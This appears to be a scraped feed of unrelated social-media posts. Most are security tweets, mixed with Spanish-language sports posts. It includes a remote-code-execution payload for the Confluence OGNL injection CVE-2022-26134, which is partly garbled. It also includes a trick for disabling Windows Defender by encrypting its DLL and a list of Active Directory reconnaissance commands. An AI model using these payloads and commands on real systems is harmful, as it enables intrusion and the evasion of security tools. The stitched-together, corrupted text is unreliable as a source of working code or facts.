CVE-2022-26134 PoC Confluence Pre-Auth RCE via OGNL Injection ${(#[email protected]@toString(Java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(Om.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

This attack I call DEFinitiveEND Properties on C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MsMpLics.dll Advanced Switch Encrypt to on Choose just this file Boot

SQL Fiddle (sqlfiddle.com) and DB Fiddle (dbfiddle.uk) are underrated resources if you want to play around with SQL injection concepts in multiple database variants.

Here's a quick demonstration of ZDI-CAN-18333 and ZDI-CAN-18802 in action. #Exchange

Me explaining why my vulnerability is a critical x.com/BornAKang/stat…

Morse code is designed so that you can decode it with this binary tree. I just assumed people memorised every letter. 🤯

F1 or del. press all those keys to see BIOS :P

LMAO in tears… wait until the end 🤣🤣

This is so cool #bugbounty via #chatgpt OpenAI

Nice blog post by Federico Dotta if you're getting into IoT/Embedded devices reverse engineering security.humanativaspa.it/a-journey-into… #iot #embedded #reverseengineering #learning

whoami whoami /groups nltest /dclist:%USERDOMAIN% net localgroup administrators net group /domain "Domain Admins" net group /domain "Enterprise Admins" net computers

CVE-2023-24068 Signal Desktop before 6.2.0 on Windows, Linux, and macOS allows an attacker to modify conversation attachments within the attachments.noindex directory. Client mechanisms fail to validate modifications of existing cached f... cve.mitre.org/cgi-bin/cvenam…

¡GRACIAS TURQUIA! 🇲🇽🥺🇹🇷🫂 Hoy el equipo turco Trabzonspor le hizo un Tifo a los cuerpos de rescate que han ayudado después del desvatador terremoto En el Tifo se pudo observar a Proteo, el perro rescatista mexicano que perdió la vida buscando sobrevivientes

Vuln: 403 & 401 Bypasses Severity: High HTTP 401 and 403 are both status codes that indicate that a client's request to a server was not successful. 401 -- client provides no credentials or invalid credentials 403 -- not enough privileges #bugbountytips #securitytips 1/n

🚨 New GIVEAWAY 🚨 It's been a year since the announcement of our first certification, #CBBH, and we're celebrating! Want to be the one to win a Silver Annual subscription? 1️⃣ Follow HTB and HackerOne  2️⃣ Like & RT this post Good luck 🍀 #BugBountyHunting #HTB #Hacking

¡MUY BIEN HIJO! Así los quiero enfocados, ojalá tus compañeritos se inspiren por ese fuego que acabas de demostrar en la cancha claro que sí ... y luces de colores chavos ... eh?